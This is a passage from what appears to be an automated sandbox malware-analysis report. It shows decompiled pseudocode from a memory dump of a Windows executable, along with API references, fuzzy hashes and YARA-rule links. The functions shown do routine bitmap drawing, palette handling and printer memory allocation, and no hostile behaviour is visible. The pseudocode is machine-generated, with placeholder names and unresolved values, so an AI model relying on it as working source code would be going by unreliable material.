						E0042D07C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
						 *((intOrPtr*)( *_v16 + 0x38))();
						_t395 = _v9;
						if(_v9 >=  *(_v8 + 0x20)) {
							_t395 = 0;
						}
						E0041B1E4(0 * _t491, _t395, 1 * _t491, 0,  &_v60, _t496);
						_t209 = _v9 - 1;
						_t511 = _t209;
						if(_t511 < 0) {
							L14:
							_push( &_v60);
							_t213 = E0042D8BC( *((intOrPtr*)(_v8 + 4)));
							E00428ED4(E0042D8BC(_v16),  &_v44, _t512, _t213);
							_t218 =  *((intOrPtr*)(_v8 + 4));
							_t513 =  *((char*)(_t218 + 0x38)) - 1;
							if( *((char*)(_t218 + 0x38)) != 1) {
								 *((intOrPtr*)(_v8 + 0xc)) = E00469F84( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
							} else {
								 *((intOrPtr*)(_v8 + 0xc)) = E00469F84( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t513);
							}
							goto L23;
						} else {
							if(_t511 == 0) {
								_v24 = 0;
								_v20 = 0;
								 *[fs:eax] = _t501;
								_v24 = E0042D2EC(1);
								_v20 = E0042D2EC(1);
								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x46a85b, _t498);
								 *((intOrPtr*)( *_v20 + 0x6c))();
								_t241 = _v8;
								__eflags =  *((char*)(_t241 + 0x20)) - 1;
								if( *((char*)(_t241 + 0x20)) <= 1) {
									 *((intOrPtr*)( *_v24 + 8))();
									 *((intOrPtr*)( *_v24 + 0x6c))();
									E00428C64( *((intOrPtr*)(E0042D8BC(_v24) + 0x14)),  *_v24, 0, _t491, _t498, __eflags);
									_t420 =  *_v24;
									 *((intOrPtr*)( *_v24 + 0x40))();
									_t254 = E0042D978(_v24);
									__eflags = _t254;
									if(_t254 != 0) {
										E00428490( *((intOrPtr*)(E0042D8BC(_v24) + 0xc)), 0xffffff);
										__eflags = 0;
										E0042E778(_v24, 0);
										E00428C64( *((intOrPtr*)(E0042D8BC(_v24) + 0x14)), _t420, 0xffffff, _t491, _t498, __eflags);
									}
									E0042E778(_v24, 1);
									_t396 = E0042D8BC(_v16);
									E00428C64( *((intOrPtr*)(_t258 + 0x14)), _t420, 0xff00000f, _t491, _t498, __eflags);
									E00429008(_t258,  &_v44);
									E00428C64( *((intOrPtr*)(_t258 + 0x14)), _t420, 0xff000014, _t491, _t498, __eflags);
									SetTextColor(E004294DC(_t396), 0);
									SetBkColor(E004294DC(_t396), 0xffffff);
									_t273 = E004294DC(E0042D8BC(_v24));
									BitBlt(E004294DC(_t396), 1, 1, _t491, _t496, _t273, 0, 0, 0xe20746);
									E00428C64( *((intOrPtr*)(_t396 + 0x14)), _t420, 0xff000010, _t491, _t498, __eflags);
									SetTextColor(E004294DC(_t396), 0);
									SetBkColor(E004294DC(_t396), 0xffffff);
									_t287 = E004294DC(E0042D8BC(_v24));
									BitBlt(E004294DC(_t396), 0, 0, _t491, _t496, _t287, 0, 0, 0xe20746);
								} else {
									_v28 = E0042D8BC(_v16);
									E0042D8BC(_v20);
									E00428ED4(_v28,  &_v44, __eflags,  &_v60);
									E0042E778(_v24, 1);
									 *((intOrPtr*)( *_v24 + 0x40))();
									 *((intOrPtr*)( *_v24 + 0x34))();
									E00428C64( *((intOrPtr*)(E0042D8BC(_v20) + 0x14)),  *_v24, 0xffffff, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E0042D8BC(_v20));
									_t327 = E0042D8BC(_v24);
									_pop(_t426);
									E00428ED4(_t327,  &_v44, __eflags);
									E00428C64( *((intOrPtr*)(_v28 + 0x14)), _t426, 0xff000014, _t491, _t498, __eflags);
									_t397 = E004294DC(_v28);
									SetTextColor(_t397, 0);
									SetBkColor(_t397, 0xffffff);
									BitBlt(_t397, 0, 0, _t491, _t496, E004294DC(E0042D8BC(_v24)), 0, 0, 0xe20746);
									E00428C64( *((intOrPtr*)(E0042D8BC(_v20) + 0x14)), _t426, 0x808080, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E0042D8BC(_v20));
									_t348 = E0042D8BC(_v24);
									_pop(_t427);
									E00428ED4(_t348,  &_v44, __eflags);
									E00428C64( *((intOrPtr*)(_v28 + 0x14)), _t427, 0xff000010, _t491, _t498, __eflags);
									_t398 = E004294DC(_v28);
									SetTextColor(_t398, 0);
									SetBkColor(_t398, 0xffffff);
									BitBlt(_t398, 0, 0, _t491, _t496, E004294DC(E0042D8BC(_v24)), 0, 0, 0xe20746);
									_push(E00427FD0( *((intOrPtr*)(_v8 + 0x1c))));
									_t365 = E0042D8BC(_v20);
									_pop(_t483);
									E00428C64( *((intOrPtr*)(_t365 + 0x14)), _t427, _t483, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E0042D8BC(_v20));
									_t372 = E0042D8BC(_v24);
									_pop(_t428);
									E00428ED4(_t372,  &_v44, __eflags);
									E00428C64( *((intOrPtr*)(_v28 + 0x14)), _t428, 0xff00000f, _t491, _t498, __eflags);
									_t399 = E004294DC(_v28);
									SetTextColor(_t399, 0);
									SetBkColor(_t399, 0xffffff);
									BitBlt(_t399, 0, 0, _t491, _t496, E004294DC(E0042D8BC(_v24)), 0, 0, 0xe20746);
								}
								__eflags = 0;
								_pop(_t469);
								 *[fs:eax] = _t469;
								_push(0x46a862);
								E0040360C(_v20);
								return E0040360C(_v24);
							} else {
								_t512 = _t209 - 0xffffffffffffffff;
								if(_t209 - 0xffffffffffffffff < 0) {
									goto L14;
								}
								L23:
								_pop(_t452);
								 *[fs:eax] = _t452;
								_push(0x46a89e);
								return E0040360C(_v16);
							}
						}
					}
				}
			}

0x0046a2e9
0x0046a2eb
0x0046a2f1
0x0046a2f4
0x0046a2fb
0x0046a306
0x0046a306
0x0046a312
0x0046a319
0x0046a8b5
0x0046a8bd
0x0046a31f
0x0046a327
0x0046a339
0x00000000
0x0046a33f
0x0046a347
0x0046a353
0x0046a356
0x0046a363
0x0046a36c
0x0046a36e
0x0046a375
0x0046a383
0x0046a383
0x0046a38c
0x0046a399
0x0046a399
0x0046a3a8
0x0046a3b6
0x0046a3c0
0x0046a3ca
0x0046a3d8
0x0046a3ed
0x0046a3fd
0x0046a409
0x0046a40c
0x0046a415
0x0046a417
0x0046a417
0x0046a42e
0x0046a436
0x0046a436
0x0046a438
0x0046a445
0x0046a448
0x0046a44f
0x0046a461
0x0046a469
0x0046a46c
0x0046a470
0x0046a4b2
0x0046a472
0x0046a48e
0x0046a48e
0x00000000
0x0046a43a
0x0046a43a
0x0046a4bd
0x0046a4c2
0x0046a4d0
0x0046a4df
0x0046a4ee
0x0046a4fc
0x0046a506
0x0046a509
0x0046a50c
0x0046a510
0x0046a6f9
0x0046a703
0x0046a713
0x0046a71d
0x0046a71f
0x0046a725
0x0046a72a
0x0046a72c
0x0046a73e
0x0046a743
0x0046a748
0x0046a75d
0x0046a75d
0x0046a767
0x0046a774
0x0046a77e
0x0046a788
0x0046a795
0x0046a7a4
0x0046a7b6
0x0046a7cc
0x0046a7e0
0x0046a7ed
0x0046a7fc
0x0046a80e
0x0046a824
0x0046a838
0x0046a516
0x0046a51e
0x0046a528
0x0046a535
0x0046a53f
0x0046a54b
0x0046a555
0x0046a568
0x0046a570
0x0046a579
0x0046a57d
0x0046a585
0x0046a586
0x0046a596
0x0046a5a3
0x0046a5a8
0x0046a5b3
0x0046a5d6
0x0046a5eb
0x0046a5f3
0x0046a5fc
0x0046a600
0x0046a608
0x0046a609
0x0046a619
0x0046a626
0x0046a62b
0x0046a636
0x0046a659
0x0046a669
0x0046a66d
0x0046a675
0x0046a676
0x0046a67e
0x0046a687
0x0046a68b
0x0046a693
0x0046a694
0x0046a6a4
0x0046a6b1
0x0046a6b6
0x0046a6c1
0x0046a6e4
0x0046a6e4
0x0046a83d
0x0046a83f
0x0046a842
0x0046a845
0x0046a84d
0x0046a85a
0x0046a43c
0x0046a43d
0x0046a43f
0x00000000
0x00000000
0x0046a881
0x0046a883
0x0046a886
0x0046a889
0x0046a896
0x0046a896
0x0046a43a
0x0046a438
0x0046a339

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4cbb1735cbabb15cce69cd6fe50ae8d3e471d40b39edd57f7847610ddc642dc
Instruction ID: 7ceaf5a3774ae82af15735474f7612c65935a98d771803492a24906e5b4cbc64
Opcode Fuzzy Hash: d4cbb1735cbabb15cce69cd6fe50ae8d3e471d40b39edd57f7847610ddc642dc
Instruction Fuzzy Hash: 7F024174B00115AFDB00FB69D986E9E7BF5AF48304F50806AF511EB392CA79ED01CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042D5EC, Relevance: 21.2, APIs: 14, Instructions: 217
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0042D5EC(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t78;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				char _t87;
				void* _t94;
				void* _t140;
				intOrPtr* _t170;
				intOrPtr _t178;
				intOrPtr _t182;
				intOrPtr _t184;
				intOrPtr _t186;
				int* _t190;
				intOrPtr _t192;
				void* _t194;
				void* _t195;
				intOrPtr _t196;

				_t171 = __ecx;
				_t194 = _t195;
				_t196 = _t195 + 0xffffffe4;
				_t190 = __ecx;
				_v8 = __edx;
				_t170 = __eax;
				_t192 =  *((intOrPtr*)(__eax + 0x28));
				_t178 =  *0x42d838; // 0xf
				E004295B0(_v8, __ecx, _t178);
				E0042DC68(_t170);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *(_t192 + 0x10);
				if(_t78 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t84 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t85);
				_t86 = _t85 * _t84;
				if(_t86 > 8) {
					L4:
					_t87 = 0;
				} else {
					_t171 =  *(_t192 + 0x28) & 0x0000ffff;
					if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) {
						_t87 = 1;
					} else {
						goto L4;
					}
				}
				if(_t87 == 0) {
					if(E0042D978(_t170) == 0) {
						SetStretchBltMode(E004294DC(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t194);
				_push(0x42d828);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196;
				if( *((intOrPtr*)( *_t170 + 0x28))() != 0) {
					E0042DC08(_t170, _t171);
				}
				_t94 = E0042D8BC(_t170);
				_t182 =  *0x42d838; // 0xf
				E004295B0(_t94, _t171, _t182);
				if( *((intOrPtr*)( *_t170 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t190, _t190[1], _t190[2] -  *_t190, _t190[3] - _t190[1],  *(E0042D8BC(_t170) + 4), 0, 0,  *(_t192 + 0x1c),  *(_t192 + 0x20),  *(_v8 + 0x20));
					_pop(_t184);
					 *[fs:eax] = _t184;
					_push(0x42d82f);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t194);
					_push(0x42d7bd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t196;
					_v28 = E004298D4(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t192 + 0xc));
					E00429A78( *(_v8 + 4), _t170, _t190[1],  *_t190, _t190, _t192, 0, 0, _v28,  *(_t192 + 0x20),  *(_t192 + 0x1c), 0, 0,  *(E0042D8BC(_t170) + 4), _t190[3] - _t190[1], _t190[2] -  *_t190);
					_t140 = 0;
					_pop(_t186);
					 *[fs:eax] = _t186;
					_push(0x42d802);
					if(_v32 != 0) {
						_t140 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t140;
				}
			}

0x0042d5ec
0x0042d5ed
0x0042d5ef
0x0042d5f5
0x0042d5f7
0x0042d5fa
0x0042d5fc
0x0042d5ff
0x0042d608
0x0042d60f
0x0042d616
0x0042d619
0x0042d61d
0x0042d622
0x0042d633
0x0042d63d
0x0042d642
0x0042d642
0x0042d654
0x0042d65e
0x0042d665
0x0042d666
0x0042d66b
0x0042d67c
0x0042d67c
0x0042d66d
0x0042d671
0x0042d67a
0x0042d680
0x00000000
0x00000000
0x00000000
0x0042d67a
0x0042d684
0x0042d6c7
0x0042d6d4
0x0042d6d4
0x0042d686
0x0042d691
0x0042d69f
0x0042d6b7
0x0042d6b7
0x0042d6db
0x0042d6dc
0x0042d6e1
0x0042d6e4
0x0042d6f0
0x0042d6f4
0x0042d6f4
0x0042d6fb
0x0042d700
0x0042d706
0x0042d714
0x0042d7fd
0x0042d804
0x0042d807
0x0042d80a
0x0042d813
0x00000000
0x0042d822
0x0042d827
0x0042d71a
0x0042d71c
0x0042d721
0x0042d726
0x0042d727
0x0042d72c
0x0042d72f
0x0042d73e
0x0042d74e
0x0042d788
0x0042d78d
0x0042d78f
0x0042d792
0x0042d795
0x0042d79e
0x0042d7a8
0x0042d7a8
0x0042d7b1
0x00000000
0x0042d7b7
0x0042d7bc
0x0042d7bc

APIs

Part of subcall function 0042DC68: GetDC.USER32(00000000), ref: 0042DCBE
Part of subcall function 0042DC68: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042DCD3
Part of subcall function 0042DC68: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042DCDD
Part of subcall function 0042DC68: CreateHalftonePalette.GDI32(00000000), ref: 0042DD01
Part of subcall function 0042DC68: ReleaseDC.USER32(00000000,00000000), ref: 0042DD0C

SelectPalette.GDI32(?,?,000000FF), ref: 0042D62E
RealizePalette.GDI32(?), ref: 0042D63D
GetDeviceCaps.GDI32(?,0000000C), ref: 0042D64F
GetDeviceCaps.GDI32(?,0000000E), ref: 0042D65E
GetBrushOrgEx.GDI32(?,?), ref: 0042D691
SetStretchBltMode.GDI32(?,00000004), ref: 0042D69F
SetBrushOrgEx.GDI32(?,?,?,?), ref: 0042D6B7
SetStretchBltMode.GDI32(00000000,00000003), ref: 0042D6D4
CreateCompatibleDC.GDI32(00000000), ref: 0042D734
SelectObject.GDI32(?,?), ref: 0042D749
SelectObject.GDI32(?,00000000), ref: 0042D7A8
DeleteDC.GDI32(00000000), ref: 0042D7B7

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: 7a98a3f2e09b9d38d6172e34fa7d17b446c01a0214f7e65f123b6915a1faa537
Instruction ID: 4dfe927d54ef61a1620e5a7498f143fb1f85de4b4f64e0ec3f3a148cda2e4f7b
Opcode Fuzzy Hash: 7a98a3f2e09b9d38d6172e34fa7d17b446c01a0214f7e65f123b6915a1faa537
Instruction Fuzzy Hash: 1D715875B00205AFDB10EFA9D985F5AB7F8AF08304F51846AF509E7381D638ED00CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00431DB8, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 198
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00431DB8(void* __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				void* _t73;
				long _t76;
				intOrPtr _t85;
				long _t95;
				void* _t96;
				long _t98;
				intOrPtr _t112;
				void* _t134;
				void* _t135;
				void* _t136;
				intOrPtr _t138;
				intOrPtr _t152;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t173;
				void* _t176;

				_t167 = __edi;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v180 = 0;
				_v184 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t134 = _a4;
				_push(_t176);
				_push(0x431ff9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t176 + 0xffffff3c;
				E00431C20(__eax, 0);
				_t73 =  *(_t173 + 0x28);
				if(_t134 != _t73) {
					 *(_t173 + 0x28) = _t134;
				}
				_t135 =  *(_t173 + 0x28);
				if(_t135 != 0) {
					GlobalFix(_t135);
					_t167 = _t73;
					 *(_t173 + 0x24) = _t73;
					E00431D7C(_t173,  *((intOrPtr*)(_t73 + 0x28)));
				}
				E0043251C(_t173);
				_t76 =  *(_t173 + 0x2c);
				if(_t76 != 0) {
					_push(_t76);
					L0043157C();
					 *(_t173 + 0x2c) = 0;
				}
				E00431AF4(_t173, _t135, 0, _t167, _t173);
				_v16 = 0xffffffff;
				_v20 = E00432090(_t173, _t135, _t167, _t173);
				_t169 =  *((intOrPtr*)( *_v20 + 0x14))() - 1;
				if(_t169 < 0) {
					L13:
					if(_v16 == 0xffffffff) {
						_v16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x10)))) + 0x14))();
						_t112 =  *0x4bad64; // 0x426474
						E0040656C(_t112, _v12,  &_v184);
						_v200 = _v8;
						_v196 = 6;
						_v192 = _a8;
						_v188 = 6;
						E00409B8C(_v184, 1,  &_v200,  &_v180);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x10)))) + 0x3c))(E004317A0(_v12, 1, _a8, _v8));
					}
					 *((intOrPtr*)(_t173 + 0x14)) = _v16;
					_push(0);
					_push(_t173 + 0x2c);
					_t85 = _v8;
					_push(_t85);
					L00431594();
					if(_t85 != 0) {
						if( *(_t173 + 0x28) == 0) {
							_push(0);
							_push( &_v176);
							_push( &_v176);
							_push(_v8);
							_t95 =  *(_t173 + 0x2c);
							_push(_t95);
							_push(0);
							L00431584();
							_t96 = GlobalAlloc(0x42, _t95);
							_t136 = _t96;
							 *(_t173 + 0x28) = _t136;
							if(_t136 != 0) {
								GlobalFix(_t136);
								_t170 = _t96;
								 *(_t173 + 0x24) = _t170;
								_push(2);
								_push(_t170);
								_push(_t170);
								_push(_v8);
								_t98 =  *(_t173 + 0x2c);
								_push(_t98);
								_push(0);
								L00431584();
								if(_t98 < 0) {
									GlobalUnWire( *(_t173 + 0x28));
									GlobalFree( *(_t173 + 0x28));
									 *(_t173 + 0x28) = 0;
									 *(_t173 + 0x24) = 0;
								}
							}
						}
						if( *(_t173 + 0x28) != 0) {
							E00431D7C(_t173,  *((intOrPtr*)( *(_t173 + 0x24) + 0x28)));
						}
					}
					_pop(_t152);
					 *[fs:eax] = _t152;
					_push(0x432000);
					return E004043FC( &_v184, 2);
				} else {
					_t171 = _t169 + 1;
					_t138 = 0;
					while(E00431800( *((intOrPtr*)( *_v20 + 0x18))(), _t138, _v8, _t173, _a8) == 0) {
						_t138 = _t138 + 1;
						_t171 = _t171 - 1;
						if(_t171 != 0) {
							continue;
						}
						goto L13;
					}
					E004045D0( *((intOrPtr*)( *_v20 + 0x18))() + 0xc, _a8);
					_v16 = _t138;
					goto L13;
				}
			}

0x00431db8
0x00431dc1
0x00431dc2
0x00431dc3
0x00431dc6
0x00431dcc
0x00431dd2
0x00431dd5
0x00431dd8
0x00431dda
0x00431ddf
0x00431de0
0x00431de5
0x00431de8
0x00431def
0x00431df4
0x00431df9
0x00431e13
0x00431e13
0x00431e16
0x00431e1b
0x00431e1e
0x00431e23
0x00431e25
0x00431e2d
0x00431e2d
0x00431e34
0x00431e39
0x00431e3e
0x00431e40
0x00431e41
0x00431e48
0x00431e48
0x00431e4f
0x00431e54
0x00431e62
0x00431e6f
0x00431e72
0x00431eb2
0x00431eb6
0x00431ec0
0x00431ee8
0x00431eed
0x00431efb
0x00431f01
0x00431f0b
0x00431f11
0x00431f23
0x00431f34
0x00431f34
0x00431f3a
0x00431f3d
0x00431f42
0x00431f43
0x00431f46
0x00431f47
0x00431f4e
0x00431f58
0x00431f5a
0x00431f62
0x00431f69
0x00431f6d
0x00431f6e
0x00431f71
0x00431f72
0x00431f74
0x00431f7c
0x00431f81
0x00431f83
0x00431f88
0x00431f8b
0x00431f90
0x00431f92
0x00431f95
0x00431f97
0x00431f98
0x00431f9c
0x00431f9d
0x00431fa0
0x00431fa1
0x00431fa3
0x00431faa
0x00431fb0
0x00431fb9
0x00431fc0
0x00431fc5
0x00431fc5
0x00431faa
0x00431f88
0x00431fcc
0x00431fd6
0x00431fd6
0x00431fcc
0x00431fdd
0x00431fe0
0x00431fe3
0x00431ff8
0x00431e74
0x00431e74
0x00431e75
0x00431e77
0x00431eae
0x00431eaf
0x00431eb0
0x00000000
0x00000000
0x00000000
0x00431eb0
0x00431ea4
0x00431ea9
0x00000000
0x00431ea9

APIs

GlobalUnWire.KERNEL32(?), ref: 00431E00
GlobalFree.KERNEL32(?), ref: 00431E09
GlobalFix.KERNEL32(?), ref: 00431E1E
738ECAE7.WINSPOOL.DRV(?,00000000,00431FF9,?,00000000,00000000,00000000), ref: 00431E41
738D74D6.WINSPOOL.DRV(?,?,00000000,?,00000000,00000000,00000000), ref: 00431F47
738DA642.WINSPOOL.DRV(00000000,?,?,?,?,00000000,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00431F74
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00431F7C
GlobalFix.KERNEL32(00000000), ref: 00431F8B
738DA642.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,00000042,00000000,00000000,?,?,?,?,00000000), ref: 00431FA3
GlobalUnWire.KERNEL32(00000000), ref: 00431FB0
GlobalFree.KERNEL32(00000000), ref: 00431FB9

Strings

tdB, xrefs: 00431EE8

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$A642.FreeWire$Alloc
String ID: tdB
API String ID: 3300168370-905615233
Opcode ID: 0490f039848640c9373674bf0be4d650096c151fb9ae2174f86e2dc1f8ee4a4a
Instruction ID: c5c23a21245c4ae09621134a60e7e1aae37a40248a86e59624358c1d98db7f41
Opcode Fuzzy Hash: 0490f039848640c9373674bf0be4d650096c151fb9ae2174f86e2dc1f8ee4a4a
Instruction Fuzzy Hash: 84710970A006049FDB20DF6AC881B5BB7F9AF4C314F10566AE949D73A1D738ED41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004298E4, Relevance: 21.1, APIs: 14, Instructions: 131
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004298E4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				struct HBITMAP__* _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				void* _t78;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;

				_t93 = _t94;
				_t95 = _t94 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t77 = __ecx;
				_v8 = __eax;
				_v28 = CreateCompatibleDC(0);
				_v32 = CreateCompatibleDC(0);
				_push(_t93);
				_push(0x429a32);
				_push( *[fs:eax]);
				 *[fs:eax] = _t95;
				GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_v24 = GetDC(0);
					if(_v24 == 0) {
						E0042982C(_t77);
					}
					_push(_t93);
					_push(0x4299a1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t95;
					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
					if(_v20 == 0) {
						E0042982C(_t77);
					}
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0x4299a8);
					return ReleaseDC(0, _v24);
				} else {
					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
					if(_v20 != 0) {
						_t78 = SelectObject(_v28, _v8);
						_t91 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t78 != 0) {
							SelectObject(_v28, _t78);
						}
						if(_t91 != 0) {
							SelectObject(_v32, _t91);
						}
					}
					_pop(_t86);
					 *[fs:eax] = _t86;
					_push(0x429a39);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}

0x004298e5
0x004298e7
0x004298f2
0x004298f3
0x004298f4
0x004298f6
0x00429900
0x0042990a
0x0042990f
0x00429910
0x00429915
0x00429918
0x00429925
0x0042992c
0x0042994d
0x00429954
0x00429956
0x00429956
0x0042995d
0x0042995e
0x00429963
0x00429966
0x0042997a
0x00429981
0x00429983
0x00429983
0x0042998a
0x0042998d
0x00429990
0x004299a0
0x0042992e
0x00429941
0x004299ac
0x004299bb
0x004299ca
0x004299f1
0x004299f8
0x004299ff
0x004299ff
0x00429a06
0x00429a0d
0x00429a0d
0x00429a06
0x00429a14
0x00429a17
0x00429a1a
0x00429a23
0x00429a31
0x00429a31

APIs

CreateCompatibleDC.GDI32(00000000), ref: 004298FB
CreateCompatibleDC.GDI32(00000000), ref: 00429905
GetObjectA.GDI32(?,00000018,?), ref: 00429925
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0042993C
GetDC.USER32(00000000), ref: 00429948
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00429975
ReleaseDC.USER32(00000000,00000000), ref: 0042999B
SelectObject.GDI32(?,?), ref: 004299B6
SelectObject.GDI32(?,00000000), ref: 004299C5
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 004299F1
SelectObject.GDI32(?,00000000), ref: 004299FF
SelectObject.GDI32(?,00000000), ref: 00429A0D
DeleteDC.GDI32(?), ref: 00429A23
DeleteDC.GDI32(?), ref: 00429A2C

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: a849f981bfebedeecbccdeb8e3bfd3461015f72c508759d878a135f9e8fdc384
Instruction ID: dac4e50baeac14ea808e198775256db36741a02f7a9f47f1c1689ece663af671
Opcode Fuzzy Hash: a849f981bfebedeecbccdeb8e3bfd3461015f72c508759d878a135f9e8fdc384
Instruction Fuzzy Hash: 8E41FBB1F40215AFDB10DBE9DC42FAFB7B8EB48704F51042AB600F7281D6799D008B68

Uniqueness

Uniqueness Score: -1.00%

Function 0044E3E8, Relevance: 19.7, APIs: 13, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0044E3E8(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				intOrPtr* _t195;
				intOrPtr* _t198;
				intOrPtr _t207;
				void* _t210;
				intOrPtr _t218;
				signed int _t236;
				void* _t239;
				void* _t241;
				intOrPtr _t242;

				_t239 = _t241;
				_t242 = _t241 + 0xffffffc4;
